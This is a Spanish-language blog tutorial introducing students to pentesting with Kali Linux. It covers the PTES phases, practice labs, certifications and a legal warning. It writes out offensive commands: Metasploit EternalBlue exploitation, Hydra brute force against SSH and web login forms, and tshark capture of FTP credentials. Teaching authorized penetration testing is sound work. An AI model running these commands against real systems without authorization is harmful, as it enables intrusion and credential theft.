Tecnología que te entiende
Pentesting con Kali Linux: guía de inicio para estudiantes
Ciberseguridad

Pentesting con Kali Linux: guía de inicio para estudiantes

12 Feb 2026 4 min de lectura 963 vistas

El pentesting es el arte de atacar sistemas con permiso para encontrar vulnerabilidades antes que los atacantes reales. Kali Linux es la distribución diseñada para esto. Aquí la guía de inicio que todo estudiante de ciberseguridad necesita.

⚠️ Aviso legal: Las técnicas descritas en este artículo son para uso educativo y en entornos controlados. Realizar pruebas de penetración sin autorización escrita es un delito en México y la mayoría de países. Practica siempre en laboratorios propios o con plataformas como TryHackMe y Hack The Box.

¿Qué es el Pentesting?

Las pruebas de penetración (pentesting) son ataques simulados y autorizados contra sistemas informáticos para evaluar su seguridad. Una empresa contrata a un pentester para que intente vulnerar sus sistemas — si tiene éxito, puede corregir las fallas antes de que un atacante real lo haga.

El pentesting sigue una metodología estructurada conocida como PTES (Penetration Testing Execution Standard):

  1. Pre-engagement — definir alcance, objetivos y reglas con el cliente
  2. Reconocimiento — recolectar información del objetivo (OSINT)
  3. Escaneo — descubrir hosts, puertos y servicios activos
  4. Enumeración — identificar versiones de software y vulnerabilidades
  5. Explotación — intentar comprometer el sistema
  6. Post-explotación — evaluar el impacto real del acceso obtenido
  7. Reporte — documentar hallazgos con evidencia y recomendaciones

Kali Linux: el sistema operativo del pentester

Kali Linux es una distribución Debian desarrollada por Offensive Security que viene preinstalada con más de 600 herramientas de seguridad. Es el estándar de la industria para pentesting.

Formas de usarlo:

  • Máquina virtual (VirtualBox o VMware) — recomendada para principiantes
  • Instalación nativa en disco
  • Contenedor Docker: docker pull kalilinux/kali-rolling
  • Live USB — sin instalar
  • WSL2 en Windows

Herramientas esenciales

1. Nmap — Escaneo de redes

Nmap es la herramienta más importante del pentesting. Descubre hosts, puertos abiertos, servicios y sistemas operativos.

# Escaneo básico de un host
nmap 192.168.1.1

# Escaneo de todos los puertos
nmap -p- 192.168.1.1

# Detectar versiones de servicios y SO
nmap -sV -O 192.168.1.1

# Escaneo agresivo (versión, scripts, OS, traceroute)
nmap -A 192.168.1.1

# Escanear una red completa
nmap -sn 192.168.1.0/24

# Guardar resultado en archivo
nmap -oN resultado.txt 192.168.1.1

2. Gobuster — Descubrimiento de directorios web

# Fuerza bruta de directorios en un sitio web
gobuster dir -u http://objetivo.com -w /usr/share/wordlists/dirb/common.txt

# Buscar subdominios
gobuster dns -d objetivo.com -w /usr/share/wordlists/subdomains.txt

3. Metasploit — Framework de explotación

Metasploit es el framework de explotación más usado del mundo. Contiene miles de exploits listos para usar.

# Iniciar Metasploit
msfconsole

# Buscar exploits para un servicio
search type:exploit name:eternalblue

# Usar un exploit
use exploit/windows/smb/ms17_010_eternalblue

# Ver opciones requeridas
show options

# Configurar objetivo
set RHOSTS 192.168.1.50

# Ejecutar
run
💡 EternalBlue: Es el exploit que usó el ransomware WannaCry en 2017 para infectar más de 200,000 computadoras en 150 países. Fue desarrollado por la NSA y filtrado por un grupo llamado Shadow Brokers. Practicar con él en un laboratorio controlado enseña por qué los parches de seguridad son críticos.

4. Wireshark — Análisis de tráfico

Wireshark captura y analiza paquetes de red en tiempo real. Fundamental para entender protocolos y detectar información en tráfico no cifrado.

# Capturar tráfico por línea de comandos (tshark)
tshark -i eth0 -w captura.pcap

# Filtrar solo tráfico HTTP
tshark -i eth0 -Y "http"

# Capturar credenciales FTP (protocolo inseguro)
tshark -i eth0 -Y "ftp" -T fields -e ftp.request.command -e ftp.request.arg

5. Hydra — Ataques de fuerza bruta

# Fuerza bruta SSH con diccionario de contraseñas
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# Fuerza bruta en formulario web
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

Laboratorios para practicar legalmente

Nunca practiques en sistemas ajenos sin permiso. Estas plataformas ofrecen entornos diseñados para ello:

  • TryHackMe (tryhackme.com) — ideal para principiantes, tiene rutas de aprendizaje guiadas
  • Hack The Box (hackthebox.com) — nivel intermedio/avanzado, máquinas reales para vulnerar
  • VulnHub (vulnhub.com) — máquinas virtuales descargables para practicar offline
  • DVWA — aplicación web deliberadamente vulnerable, instálala en Docker
  • Metasploitable — VM de Linux llena de vulnerabilidades para practicar con Metasploit
# Levantar DVWA con Docker para practicar
docker run -d -p 8080:80 vulnerables/web-dvwa

Certificaciones para avanzar

Si quieres hacer del pentesting una carrera, estas son las certificaciones más valoradas:

  • eJPT (eLearnSecurity) — perfecta para empezar, 100% práctica
  • CEH (Certified Ethical Hacker) — muy reconocida en empresas
  • OSCP (Offensive Security) — el estándar de oro del pentesting, muy difícil y muy valorada
  • CompTIA Security+ — base de ciberseguridad, recomendada antes del CEH
"Para defender un sistema, primero debes aprender a atacarlo. El mejor guardia de seguridad es el que sabe cómo piensan los ladrones."